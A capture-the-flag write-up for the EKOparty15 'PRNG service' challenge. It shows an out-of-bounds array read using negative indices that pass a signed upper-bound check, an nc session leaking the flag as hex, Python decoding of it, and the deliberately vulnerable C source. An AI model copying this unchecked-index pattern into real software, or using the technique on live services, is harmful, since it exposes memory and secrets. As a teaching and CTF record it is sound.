EKOparty PRNG service

@mrexcessive WHA

EKOparty15 pwn25 PRNG Service

 

The problem

Description: This is our PRNG service
source.c provided on Null.Life
running at:
nc challs.ctf.site 20003

Pwnable Exploit

 

The solution

OK so the code puts the ANSWER in an array and then generates 64 random numbers further down the array after offset base. The main loop lets the user inspect any of the numbers by entering a number to scanf("%d") and using that number as an offset. So enter 4 and it will tell you the 4th random number in the arry.

The scanf("%d") is not exploitable itself... so...

There is a check to make sure you don't put in a number bigger than 64.
But there is nothing to prevent you putting in a negative number, which lets you move to array indexes below base

So I do that a few times.

I find the flag between -57 and -64, (I should have expected this as base is 64 !)

nc challs.ctf.site 20003
Welcome to PRNG service
Please wait while we generate 64 random numbers...5f
Process finished
Choose a number [0-63]?-57
Your number is: 0x6e312d5f
Choose a number [0-63]?-59
Your number is: 0x69735f64
Choose a number [0-63]?-60
Your number is: 0x6e615f6e
Choose a number [0-63]?-61
Your number is: 0x6169646e
Choose a number [0-63]?-62
Your number is: 0x655f656c
Choose a number [0-63]?-63
Your number is: 0x7474696c
Choose a number [0-63]?-64
Your number is: 0x7b4f4b45        "EKO{"

So to Python...

>>>print "454b4f7b6c6974746c655f656e6469616e5f616e645f73695f2d316e747d".decode("hex")
EKO{little_endian_and_si_-1nt}

erm...

Ah I missed out offset -58... wups !

Choose a number [0-63]?-58
Your number is: 0x64656e67

Python again...

>>>print "454b4f7b6c6974746c655f656e6469616e5f616e645f7369676e65645f2d316e747d".decode("hex")
EKO{little_endian_and_signed_-1nt}
Flag ! EKO{little_endian_and_signed_-1nt}

--> ref source:

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <answer.h>

int main()
{

        signed int i;
        unsigned int base, try, rnd[128];

        printf("Welcome to PRNG service\nPlease wait while we generate 64 random numbers...\n");
        fflush(0);
        sleep(2);
        strcpy((char *)&rnd[0], ANSWER); # our flag is stored on answer.h
        srandom(1337);
        base = 64;
        for (i = 0; i < 64; i++) rnd[base + i] = random();
        printf("Process finished\n");
        fflush(0);
        try = 0;
        while (try < 10) {
                printf("Choose a number [0-63]?");
                fflush(0);

                scanf("%d", &i);
                fflush(0);

                if (i < 64) {
                        printf ("Your number is: 0x%08x\n", rnd[base + i]);
                } else {
                        printf("Index out of range\n");
                }
                try++;
                fflush(0);

        }
        printf ("Thank you for using our service\n");
        fflush(0);

        return 0;
}